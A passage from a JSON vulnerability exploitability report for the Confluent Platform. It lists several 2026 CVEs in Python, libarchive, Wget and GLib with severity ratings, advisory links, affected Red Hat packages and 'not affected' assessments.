        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-1502",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "CR/LF bytes were not rejected by HTTP client proxy tunnel headers or host.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1502"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/11/4"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1502"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-19177.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/05ed7ce7ae9e17c23a04085b2539fe6d6d3cef69"
        },
        {
          "url": "https://github.com/python/cpython/commit/56b7100b04e44ea27989242b176beb8f016b2c53"
        },
        {
          "url": "https://github.com/python/cpython/commit/58703ec1bdd1eb075e8b01a0c427683ce594dd3e"
        },
        {
          "url": "https://github.com/python/cpython/commit/9e071c9b28c17f347f81b388a003d4eeb3c7a8dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/b1cf9016335cb637c5a425032e8274a224f4b2ed"
        },
        {
          "url": "https://github.com/python/cpython/commit/c00c386faa579ad71196d33408644478488e43ec"
        },
        {
          "url": "https://github.com/python/cpython/issues/146211"
        },
        {
          "url": "https://github.com/python/cpython/pull/146212"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-1502.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/2IVPAEQWUJBCTQZEJEVTYCIKSMQPGRZ3/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1502"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1502"
        }
      ],
      "published": "2026-04-10T18:16:40+00:00",
      "updated": "2026-08-13T01:16:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-15028",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        805,
        122
      ],
      "description": "A flaw was found in libarchive. This vulnerability allows a remote attacker to trigger a heap overflow by providing a specially crafted tar archive. The issue occurs during the parsing of a PAX extended header containing a malformed SUN.holesdata sparse-file attribute. Successful exploitation could lead to a denial of service, making the system unavailable, or potentially allow for arbitrary code execution, giving the attacker control over the affected system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-15028"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:38279"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-15028"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497970"
        },
        {
          "url": "https://github.com/libarchive/libarchive/issues/3251"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/3253"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15028"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8581-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15028"
        }
      ],
      "published": "2026-07-10T10:16:23+00:00",
      "updated": "2026-08-19T11:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-15146",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "GNU Wget does not validate the IP address provided by an FTP PASV response while operating in FTP passive mode. A malicious FTP server, or an HTTP server that redirects to an FTP URL, can exploit this behavior to redirect Wget\u2019s data connection to an arbitrary IP address and port. This allows an attacker to forge server-side requests (SSRF) from the machine running Wget, potentially accessing localhost services or internal network resources.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-15146"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-15146"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/wget.git/commit/?id=4f85853f641863d5915786a8413e1a213726a62b"
        },
        {
          "url": "https://kb.cert.org/vuls/id/564823"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15146"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8572-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15146"
        },
        {
          "url": "https://www.kb.cert.org/vuls/id/564823"
        }
      ],
      "published": "2026-07-10T19:17:20+00:00",
      "updated": "2026-07-15T19:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-8.el9_4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-15588",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        770
      ],
      "description": "A denial-of-service and resource exhaustion vulnerability exists within the `GDBus` component of GLib. The `gdbusauth` authentication mechanism fails to enforce proper length limitations on data lines read from a client. An unauthenticated local or remote attacker can exploit this lack of input validation by sending excessively long streams of data, causing the application to consume massive amounts of system memory and CPU, potentially leading to a crash or system hang.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-15588"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39985"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40485"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42329"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-15588"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3985"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-15588.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15588"
        },
        {
